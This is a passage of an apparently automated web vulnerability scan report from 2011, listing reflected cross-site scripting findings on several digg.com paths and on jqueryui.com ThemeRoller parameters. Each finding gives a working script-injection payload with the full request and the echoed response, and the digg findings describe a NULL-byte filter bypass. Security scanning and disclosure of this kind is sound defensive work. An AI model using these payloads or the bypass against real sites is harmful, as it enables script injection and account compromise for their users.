Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18123

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/submit/crawl%0019fdd"><script>alert(1)</script>7a8b0f85e9c.rss">
...[SNIP]...

2.19. http://digg.com/login [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d5183"><script>alert(1)</script>fbcd4c8b309 was submitted in the REST URL parameter 1. This input was echoed as d5183"><script>alert(1)</script>fbcd4c8b309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /login%00d5183"><script>alert(1)</script>fbcd4c8b309 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=217960 10.2.129.155
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18113

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/login%00d5183"><script>alert(1)</script>fbcd4c8b309.rss">
...[SNIP]...

2.20. http://digg.com/register [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/register

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c0388"><script>alert(1)</script>65b8dbc7903 was submitted in the REST URL parameter 1. This input was echoed as c0388"><script>alert(1)</script>65b8dbc7903 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /register%00c0388"><script>alert(1)</script>65b8dbc7903 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=275292 10.2.130.111
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18119

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/register%00c0388"><script>alert(1)</script>65b8dbc7903.rss">
...[SNIP]...

2.21. http://digg.com/search [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005a216"><script>alert(1)</script>04c84f7943d was submitted in the REST URL parameter 1. This input was echoed as 5a216"><script>alert(1)</script>04c84f7943d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /search%005a216"><script>alert(1)</script>04c84f7943d HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=205025 10.2.129.90
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18107

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/search%005a216"><script>alert(1)</script>04c84f7943d.rss">
...[SNIP]...

2.22. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0034ebf"><script>alert(1)</script>07ed2e5f09b was submitted in the REST URL parameter 1. This input was echoed as 34ebf"><script>alert(1)</script>07ed2e5f09b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /submit%0034ebf"><script>alert(1)</script>07ed2e5f09b?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=281051 10.2.129.97
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18272

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0034ebf"><script>alert(1)</script>07ed2e5f09b?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx.rss">
...[SNIP]...

2.23. http://digg.com/topic [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/topic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006361e"><script>alert(1)</script>13807bfb062 was submitted in the REST URL parameter 1. This input was echoed as 6361e"><script>alert(1)</script>13807bfb062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /topic%006361e"><script>alert(1)</script>13807bfb062 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=220732 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18112

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/topic%006361e"><script>alert(1)</script>13807bfb062.rss">
...[SNIP]...

2.24. http://digg.com/upcoming [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/upcoming

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d52d9"><script>alert(1)</script>0f1d8b4e8f1 was submitted in the REST URL parameter 1. This input was echoed as d52d9"><script>alert(1)</script>0f1d8b4e8f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /upcoming%00d52d9"><script>alert(1)</script>0f1d8b4e8f1 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=193751 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18118

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/upcoming%00d52d9"><script>alert(1)</script>0f1d8b4e8f1.rss">
...[SNIP]...

2.25. http://jqueryui.com/themeroller/ [bgColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e92"><script>alert(1)</script>67aee4135f0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada50e92"><script>alert(1)</script>67aee4135f0&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada50e92"><script>alert(1)</script>67aee4135f0&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighligh
...[SNIP]...

2.26. http://jqueryui.com/themeroller/ [bgColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62918"><script>alert(1)</script>0f9411eb6e5 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=00000062918"><script>alert(1)</script>0f9411eb6e5&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=00000062918"><script>alert(1)</script>0f9411eb6e5&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=
...[SNIP]...

2.27. http://jqueryui.com/themeroller/ [bgColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0998"><script>alert(1)</script>a72e36b6181 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8Fa0998"><script>alert(1)</script>a72e36b6181&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8Fa0998"><script>alert(1)</script>a72e36b6181&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHo
...[SNIP]...

2.28. http://jqueryui.com/themeroller/ [bgColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be25c"><script>alert(1)</script>a29993d1aed was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecbe25c"><script>alert(1)</script>a29993d1aed&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecbe25c"><script>alert(1)</script>a29993d1aed&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverl
...[SNIP]...

2.29. http://jqueryui.com/themeroller/ [bgColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca387"><script>alert(1)</script>d58ea5446de was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadadaca387"><script>alert(1)</script>d58ea5446de&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadadaca387"><script>alert(1)</script>d58ea5446de&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

2.30. http://jqueryui.com/themeroller/ [bgColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7fa2"><script>alert(1)</script>ef87dfaa078 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9eee7fa2"><script>alert(1)</script>ef87dfaa078&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9eee7fa2"><script>alert(1)</script>ef87dfaa078&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError
...[SNIP]...

2.31. http://jqueryui.com/themeroller/ [bgColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcfa"><script>alert(1)</script>b9131c7690b was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

